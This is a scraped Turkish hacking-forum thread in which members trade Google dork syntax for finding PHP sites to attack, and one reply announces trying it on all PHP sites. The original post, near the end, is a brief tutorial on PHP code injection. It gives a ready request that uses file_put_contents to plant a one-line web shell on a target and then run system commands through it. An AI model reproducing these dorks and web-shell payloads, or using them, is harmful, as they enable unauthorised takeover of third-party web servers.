.
Bu içeriği görmek için giriş yapın.
Son düzenleme:
Bu içeriği görmek için giriş yapın.
Bu içeriği görmek için giriş yapın.
EyvallahEline sağlık
Bu içeriği görmek için giriş yapın.
Bu içeriği görmek için giriş yapın.
Php site aratmak için ext değil inurl kullan ext ile dosya ararsın site yazılımı bunlara dahil değil daha çok txt ve excel dosyaları gibiEline saglik, simdi tum php sitelere denemeye gidiyorum.https://www.google.com/search?q=-site:*.tr+AND+ext
hp
Bu içeriği görmek için giriş yapın.
Bal gibi de dahil valla, dene istersenPhp site aratmak için ext değil inurl kullan ext ile dosya ararsın site yazılımı bunlara dahil değil daha çok txt ve excel dosyaları gibi
Bu içeriği görmek için giriş yapın.
Dahil değil derken amacına hizmet etmez diyorum kardeş php dorkları inurl ile yazılır ext değilBal gibi de dahil valla, dene istersen
Bu içeriği görmek için giriş yapın.
Anladım dostum, eyvallahDahil değil derken amacına hizmet etmez diyorum kardeş php dorkları inurl ile yazılır ext değil
Bu içeriği görmek için giriş yapın.
Bu içeriği görmek için giriş yapın.
.Merhaba değerli üyeler kısa bir konu olacak ama anlarsınız diye düşünüyorum...
Php code injection file_put_contents() gibi fonksiyonların kullanıldığı zaman çıkan bir açıktır php 5x ve php 7x de görülür
http://hedefsite.com/index.php?code=file_put_contents('shell.php', '<?php system($_GET["cmd"]); ?>');
Shell.php adında bir dosya oluşturup içine
"<?php system($_GET["cmd"]); ?>"
Yazdırarak shell almamızı sağlıyor.
file_put_contents('shell.php') > fonksiyonu ile shell atabilirsiniz.
En sonda ise alttaki kodu yazarak komutlarinizi yazabilirsiniz.
shell.php?cmd=ls > komut
THE END
Bu içeriği görmek için giriş yapın.